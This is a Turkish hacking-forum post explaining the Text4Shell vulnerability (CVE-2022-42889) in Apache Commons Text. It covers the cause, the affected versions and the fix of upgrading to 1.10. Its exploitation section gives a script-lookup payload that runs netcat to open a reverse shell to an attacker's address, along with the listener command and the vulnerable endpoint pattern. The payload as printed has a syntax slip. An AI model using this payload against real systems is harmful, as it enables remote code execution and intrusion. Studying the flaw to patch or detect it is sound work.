StringSubstitutor İnterpolator CVE-2022-42889 Nedir ?

a3b2jeo.png


logo.png


Görsel


StringSubstitutor İnterpolator CVE-2022-42889 Nedir ?


Bu güvenlik açığı, Commons Text kütüphanesine dahil edilen StringSubstitutor interpolator sınıfını etkiler. Varsayılan bir interpolatör, varsayılan olarak "script", "dns" ve "url" arama anahtarlarını etkileyebilecek dize aramalarına izin verir. Bu, StringLookupFactory sınıfının belgelerine göre olması gerektiği gibi değil, varsayılan olarak etkileyici bir mantık hatasından kaynaklanır. Bu anahtarlar bir saldırganın aramalar aracılığıyla herhangi bir kodu yürütmesine izin verir.

Güvenlik açıklarını sömürmek için aşağıdaki gereksinimler karşılanmalıdır:

Apache Commons Text'in 1.5 ile 1.9 sürümleri arasında bir sürümü çalıştırın.
StringSubstitutor interpolatörünü kullanın.
StringSubstitutor interpolatörünün, Log4j'deki dize yerine koyma kadar yaygın olarak kullanılmadığını belirtmek önemlidir, bu da Log4Shell'e yol açan bir durumu gösterir.

CVE-2022-42889 Nasıl Sömürülür

Saldırıyı çoğaltmak için, savunmasız bileşen bir Docker konteynerine dağıtıldı ve saldırgan tarafından kontrol edilen bir EC2 örneğinden erişilebilirdi. Netcat (nc) komutunu kullanarak, savunmasız uygulamayla bir reserve shell bağlantısı açabiliriz.

Savunmasız web uygulaması, sorgu StringSubstitutor aracılığıyla etkileyici bir şekilde sunan bir arama API'sini ortaya koyar.

Kod:
http://web.app/text4shell/attack?search=<query>

Aşağıdaki payload, güvenlik açığını sömürmek ve reserve shell açmak için kullanılabilir:

Kod:
${script:javascript:java.lang.Runtime.getRuntime.exec()'nc 192.168.49.1 9090 -e /bin/sh')}

Bu payload, String Lookup'u tetikleyen "${prefix:name}" ifadesinden oluşur. Yukarıda belirtildiği gibi, "script", "dns" ve "url" anahtarları, güvenlik açığını sömürmek için ön ek olarak kullanılabilen anahtarlar arasındadır.

Hazırlanan isteği göndermeden önce, reserve shell bağlantısını kurmak için netcat (nc) komutunu kullanarak 9090 numaralı portu dinlememiz gerekiyor.

Kod:
nc -nlvp 9090

Şimdi hazırlanan isteği gönderebiliriz. Yükü URL kodlamasıyla şu şekilde gösterildiği gibi.

1.png


Saldırganın başarıyla savunmasız uygulama ile bağlantı kurduğunu görebiliriz.

1f221c3605831889c.png



Şimdi saldırgan, savunmasız makine ile root erişimi sağlayabilir ve keyfi kodları yürütebilir.


CVE-2022-42889'u Çözümü


Eğer CVE-2022-42889'dan etkileniyorsanız, uygulamayı 1.10 sürümüne güncellemelisiniz.


Kaynaklarım :


a3b2jeo.png
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.